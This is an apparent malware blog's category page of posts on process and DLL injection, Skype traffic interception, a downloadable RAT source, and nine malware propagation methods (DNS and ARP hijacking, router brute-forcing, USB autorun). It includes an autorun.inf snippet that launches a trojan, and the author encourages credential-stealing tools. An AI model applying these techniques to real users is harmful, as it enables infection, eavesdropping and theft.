» Injection

Things to do for the next days …

carrumba — Fri, 01 Oct 2010 11:27:33 +0000

I’m still struggling to make SkypeTap (skype interception module) work on Win7. This week things just don’t go as smoothly as expected :/ As soon as I have a result (may it be positive or negative) I’ll let you know.

If it works I think a further post would be appropriate that shows in detail how to inject *something* into a process and what different approches exist to do that.

Interesting PHP injection

carrumba — Thu, 02 Sep 2010 16:45:06 +0000

Read on Sans

PHP injection attacks have become increasingly popular lately. If you look at your web server logs I’m pretty sure that you will find dozens of requests for PHP injection, usually by bots that are simply trying some well known (and less known) vulnerabilities.
One of our readers, Blake, managed to capture some interesting attempts to exploit various PHP injection vulnerabilities on his web site, thanks to installation of mod_security. Contrary to popular PHP injection attempts, where the attacker tries to exploit a variable to get the PHP interpreter to retrieve a remote PHP script, Blake noticed that the attacker tried to exploit a vulnerability in a PHP script through POST request. The attacker submitted a malicious PHP script (with other data) hoping that the PHP interpreter will execute it – this vulnerability also exist, although not that common. Here is what the attack looked like in log files …

Trj/Casper.A sources.

carrumba — Mon, 15 Feb 2010 07:12:30 +0000


Name	Trj.Casper

Type	RAT

Author	Unknown

Written in	C

Description	This sourcecode dates back to 2004. It is quite old and its functionality is rather limited. The intresting part in this source code is the injection section which represents the biggest part of it. It contains an injection function based on the CreateRemoteThread call and all required functions to make it completely run in a remote process. You can use it as a basic example and extend it with your own functionality.

Questions	Do you have a question about this RAT/bot/worm? At the bottom of this post you find the box where you can type and send your message.

Downloads	Source

Watching encrypted Skype traffic with SkypeDLLInjector

carrumba — Tue, 04 Aug 2009 12:30:22 +0000


Tool name :	SkypeDLLInjector version 0.1

Description :	SkypeDLLInjector is a tool to demonstrate how DLL injection works. In this proof of concept it is applied to the Skype application. It consists of a loader application which remains running in the background and a DLL which will be injected into every newly started program via a system wide Windows hook. All what this tool does is interception the function calls recv() and send() to inspect the network data skype is sending and receiving. Because Skype traffic is encrypted only a small portion of the traffic is readable. But it could inspire you to create your own tools which eavesdrop other calls to intercept sensitive data (as the username and password for example).

Tested on :	Windows XP

Feedback :	In case you encounter any problems with the tool, you have suggestions to improve it, or you tested it with a Windows version i’ve not yet tested please drop me an email.

Downloads :	Binary \| Source

DLL injection by modifying an executable file.

carrumba — Fri, 03 Jul 2009 16:43:53 +0000

This is a newer document from 2009 that explains DLL injection. Instead of using the often used Windows hooking method to inject a DLL into a running process in this example the author modifies the binary itself and loads the DLL when starting the executable file.

Download it here.

Nine ways how hackers propagate malware (2 of 2)

carrumba — Wed, 06 May 2009 23:44:05 +0000

In the first part of this series I wrote about the different ways how attackers propagate malware by sending an infectious executable file or an USB memory stick to their victims or let them pick up an infected file in a file sharing network like emule or bittorrent.
In this article, as promised in the first part, I want to explain how to propagate and inject malware by taking over a victims data stream.

There are two ways how to take over a data stream. From the inside of the victims network (LAN) or from the outside (the Internet). Both of these tactics have their advantages, disadvantages and methods how to proceed which I will explain in the following paragraphs. I wont go too deep into details and technical aspects. Otherwise I had to split this article again in a second and a third part because it would blow it up overly. I will explain the technical aspects in an other article independent from this series and will add example tools and source code where possible.

Attacking the victims home LAN

Beside the fact that home Internet routers are generally weaker protected than corporate Internet access appliances one of the weak links in home routers is often the integrated wireless access point. Sometimes the Internet routers are delivered with the WLAN module activated and only protected by the default settings. Other times the owner activates the WLAN himself and chooses an insecure password or an insecure protection standard like WEP or nowadays also WPA has its weakness. If one of these preconditions is the case chances are good an attacker will overcome the protection mechanisms. Once he is connected with the victims local network over the WLAN several not too complicated scenarios exists to take over the data stream.

Method 5 : Taking over the DNS

The Internet doesn’t understand host names like www.megapanzer.com. Instead it uses IP addresses like 194.208.66.33. And because we are to lazy to remember these irritating IP addresses and prefer the significant hostnames instead the DNS maps between this addressing conventions. Everytime you want to connect to the megapanzer server www.megapanzer.com your computer has to ask a DNS server under which IP address this server is reachable. It doesn’t take too much imagination taking over the DNS service in a victims LAN is the key to the power. Once an attacker controls the DNS, for example by injecting faked DNS response, he controls where the data stream is directed. Traffic destined for ebanking.ubs.com can easily be redirected to an attackers server.

Method 6 : Acting as default gateway

The computers in an ethernet based LAN don’t communicate by IP their addresses. IP addresses are used in the Internet but not inside a small, ethernet based home LAN. Ethernet is using MAC addresses. So every network adapter connected to a computer was assigned once a unique MAC address by its manufacturer. The computers in a LAN constantly tell each other what MAC address and what IP address they have and they keep this information in their memory for a while. Also WLAN adapters support the ethernet standard and have therefore MAC addresses. The only difference between wired and wireless network adapters is the medium (air and copper) they are using, the first layer in the OSI model. From layer 2 on they work exactly the same way.
This situation allows an attacker to spread wrong information inside a LAN and telling every computer HIS computer is the router that leads to the Internet. Afterwards every computer sends its data packets to the attacker instead to the real Internet router. The attacker takes over the data stream and can do with it whatever he wants. Relaying, modifying, blocking …

To give you an idea how this two examples lead to a successful data injection just imagine you as a victim want to download an executable file via your browser. You click on a specific link and are expecting the browser will download this file. An attacker can intercept your request and instead of sending back the real executable the trojan horse will be injected and disguised to make it look unsuspicious. Even if sceptics think you could check the hash checksum also them know only a small percentage really does it and the check sums are not provided everytime.

Method 7 : Intruding the victims Internet router

As you saw in the previous examples the Internet access router is the central point. These attacks were conducted from the internal part of the network. There is also an external part of the network which attackers can reach and attack over the Internet.
Still a big number of home Internet routers are accessible over the Internet and offer a user interface for administration purposes. Often over HTTP/HTTPS and also Telnet and SSH. But private users are not known for having a IT security policy they have to respect. So you can think of several situations you encounter when connecting to a home router:

The admin interface acces is blocked
The admin interface access is open but unprotected
The admin interface access is open and protected with the default account settings
The admin interface access is open and protected with a new password

These sittuations invite an attacker to invest some time and trying to crack the password by a bruteforce or dictionary attack.
Once this obstacle was overcome by an attacker he has the control over the appliance, the place where all the data passes to and from the Internet. As an example how the stream can be controled by the attacker think of the DNS service from the two previous examples. The attacker can configure the Internet router that way to redirect all the DNS requests to a DNS server that is controlled by the attacker.

Method 8 : Anonymizing proxy server data injection

TOR and I2P, to mention the most famous amongst them, are quite popular anonymizing services. You install the proxy software on your computer, customize your browser a little and you surf the net anonymously. But the anonymizing services have the problem when the data stream reenters the regular Internet again you don’t know if and who is reading or maybe even manipulating your data stream.
At least in the open and anonymizing proxy chains it is an easy game to infiltrate other peoples data stream, to read it, to manipulate it and to inject data they never requested (read here).

Method 9 : DNS cache poisoning

I would consider DNS cache poisoning as a rather esotherical method that maybe worked one day. But then I remember just too good when Dan Kaminsky discovered and published the DNS poisoning vulnerability. But as with TCP/IP spoofing, the Sendmail Debug or CGI/PHF vulnerabilities, it just doesn’t happen anymore.

DNS cache poisoning is a technique to convince for example a big ISPs DNS server, like the one from Bluewin (the biggest access provider in Switzerland), a hostname outside of their domain like ebanking.ubs.com is reachable under the IP address 192.168.1.1. Of course this is the wrong IP address but all the Bluewin users who ask this DNS server for the IP address of ebanking.ubs.com will see this answer. by using DNS cache poisoning an attacker could redirect the data packets from the Bluewin users to a destination of his choice. He controls the stream.

Nine ways how hackers propagate malware (1 of 2)

carrumba — Tue, 24 Mar 2009 13:01:11 +0000

Malware propagation is one of the most fascinating parts of the attackers activities and is attracting, besides the anger of the affected people, the most attention. It is the part where all the magic of infection and intrusion happens, where attackers release the malicious software to the wild and try to infect new victim systems as quickly or as targeted as possible; their victims are left wondering how the heck that could have happened.

The goal of this article is to give you an overview how and where attackers release malware. It will show you an overview about the common infection points where people get in first contact with malware and what action the software has to execute to initiate the infection process.

Method 1 : Sending the Trojan horse as email attachment

One of the oldest but still very effective ways people get infected is via email, by opening an attached file. Email is the most used way people communicate over the Internet. Almost everyone owns an email address and is using it regularly. It is easy to use, it’s accessible from everywhere where you have Internet access. Today, most email services are for free too.

As already mentioned sending malware as an email attachment was already a propagation method in the early days. The attacker prepared the Trojan horse, sent it to all the recipients on his list and waited until the infected systems connected back. Simple and straightforward. The only thing the recipient (the victim) had to do was to double-click the attachment to initiate the infection process. Back in the days anti virus software was not that wide spread as it is nowadays, the people were not that cautious and sensitised to this kind of threat. Many email users were only a double-click away from the infection.
Today as AV software is installed on virtually every computer and people are aware of the threat, that way of propagation still works surprisingly well. But things turn out slightly more difficult. An AV software doesn’t accept *.exe *.com *.bat or *.pif files anymore and it also checks archives like *.zip or *.rar files for executable files. If they contain files with suspicious file name extensions it rises a warning and interrupts the execution. But because there is still a big mass of potential victims among the email users that are obstinately ignoring any kind of warnings the infection rate is still high and for an attacker this archaic means is still promising and valuable.

Method 2 : Infection via browser bugs

The browser is doubtlessly the most used application on a computer. We use it to surf the Internet, to check our mails of course, to chat and many programs people had once installed locally on the computer is now loaded into the browser and ready to use, as for example text processing programs or spreadsheets. Browsers have a big importance and over the years their functionality and extensions grew and changed its usage enormously. With its quick development and the possibility to install plugins also the attack vector grew. Code reviews were conducted more often and not only on the browsers but also on the plugins what revealed many critical and also not so critical bugs. These circumstances also attracted the attackers attention and allowed them new ways to spread their malware. By leading a victim to a site that contains malicious HTML, scripting or plugin code an attacker can force the victims browser to execute hidden actions, force it to download and install the damage routine of the Trojan horse and to infect the system that way.
This is much more convenient than the variant with the infected attachment. An email containing a simple link to a homepage doesn’t seem suspicious and additionally it is a one-click-infection (instead of a double-click).

Method 3 : Removable data storage devices

There was once a time where the classic computer viruses propagation happened by sharing infected floppy discs and executing program files. To share and to execute was simply the only method. Even if floppy disks are not in use as data storage device anymore (maybe you’re still using it as boot device) the method itself is still in use. In the meantime CD-ROMs and USB memory sticks replaced the floppy discs almost completely and Microsoft introduced the Autorun feature that executes commands automatically when a newly connected data storage device is connected. This combination of removable storage devices and autoexecution revived the ancient propagation method and the USB memory sticks and CD-ROMs/DVDs served beside being data storage medium also as host to infect computers with malware.

Here is an example how the file autorun.inf has to look like :

[autorun]
open=installMegapanzer.exe
icon=myIcon.ico

This way of malware propagation was used a lot in the past and Microsoft and also other installed 3rd party software will trigger an alert if a data storage device is using the autorun feature. So this method is not that reliable anymore and has its restrictions.

Additionally and worth mentioning: A Trojan horse itself can, once running on a victims system, infect other writable USB data storage devices and so propagate in the old known manner as it happened with the floppy disks. Ancient but proven.

Method 4 : File sharing networks

Another common way to propagate malware is using the different internet based filesharing networks like Bittorrent, Emule, Limewire etc. An attacker tries to get hold of a new release of a popular software and injects his malicious code into the genuine software packet. After the initial infection the attacker offers the infected file to other users for download.
There are two advantages coming with this method:

If a victim downloads the infected file he’s “expecting” an executable file and doesn’t become suspicious just because of its file extension. He “will” execute it after downloading.
Once the file is downloaded by the first victim the availability of the file doubled. Two people offer the infected file now for download. What the attacker has to do is only to make sure he is using a popular software and the propagation will advance in a fast pace.

What’s coming up in the second article

The goal of the first part was to describe the methods how attackers propagate their malware by distributing it in an active way, by sending “something” to the victims expecting they have execute an action with this “something”. These ways are well known to all of us because the media permanently informs about the threats we are exposed to, the latest incidents that happend and is giving us the relevant background information. In the next article I will give you an understanding of how to inject the malware in a victims browsing session by taking over and controlling his data stream. More subliminal, more state-of-the-art, stay tuned.